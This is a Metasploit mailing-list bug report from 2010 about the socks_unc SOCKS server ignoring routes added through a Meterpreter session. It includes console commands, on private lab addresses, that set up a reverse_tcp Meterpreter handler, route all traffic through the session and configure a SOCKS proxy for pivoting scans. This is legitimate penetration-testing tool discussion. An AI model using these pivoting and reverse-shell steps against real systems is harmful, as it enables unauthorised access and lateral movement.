Metasploit mailing list archives

Bug report or Feature request socks_unc/route


From: Mark Baggett <lo127001 () gmail com>
Date: Tue, 16 Mar 2010 21:55:31 -0400

I don't know if this is a bug or a product enhancement, but here it goes....

I want to use Proxychains to route nmap, nessus and other tcp/udp tools through a meterpreter session. After I get Meterpreter on a host as session 1 I want to add a route and use the SOCKS_UNC server with proxychains. Similar to these vids but instead of an SSH server use the SOCKS_UNC auxiliary module:

http://pauldotcom.com/2010/03/ssh-gymnastics-with-proxychain.html
http://pauldotcom.com/2010/03/nessus-scanning-through-a-meta.html

But the SOCKS_UNC server doesn't use the route that is added and packets still route locally. Here is what I did..


root@bt:/pentest/exploits/framework3# ./msfconsole

                                  _       _
             _                   | |     (_)_
 ____   ____| |_  ____  ___ ____ | | ___  _| |_
|    \ / _  )  _)/ _  |/___)  _ \| |/ _ \| |  _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
                           |_|


       =[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 533 exploits - 254 auxiliary
+ -- --=[ 198 payloads - 23 encoders - 8 nops
       =[ svn r8826 updated today (2010.03.15)

msf > color false
msf > use multi/handler
msf exploit(handler) > set LHOST 172.16.186.132
LHOST => 172.16.186.132
msf exploit(handler) > set LPORT 80
LPORT => 80
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST     172.16.186.132   yes       The local address
   LPORT     80               yes       The local port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > exploit

[*] Started reverse handler on 172.16.186.132:80
[*] Starting the payload handler...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (172.16.186.132:80 -> 172.16.186.128:3782)

meterpreter >
Background session 1? [y/N]  y
[-] Unknown command: y.
msf exploit(handler) > route add 0.0.0.0 0.0.0.0 1
msf exploit(handler) > back
use server/socksmsf > use server/socks_unc
msf auxiliary(socks_unc) > set SRVPORT 9050
SRVPORT => 9050
msf auxiliary(socks_unc) > set SRVHOST 172.16.186.132
SRVHOST => 172.16.186.132
msf auxiliary(socks_unc) > show options

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     172.16.186.132   yes       The local host to listen on.
   SRVPORT     9050             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   UNCHOST                      no        The address of the UNC host.


Thanks,
Mark Baggett
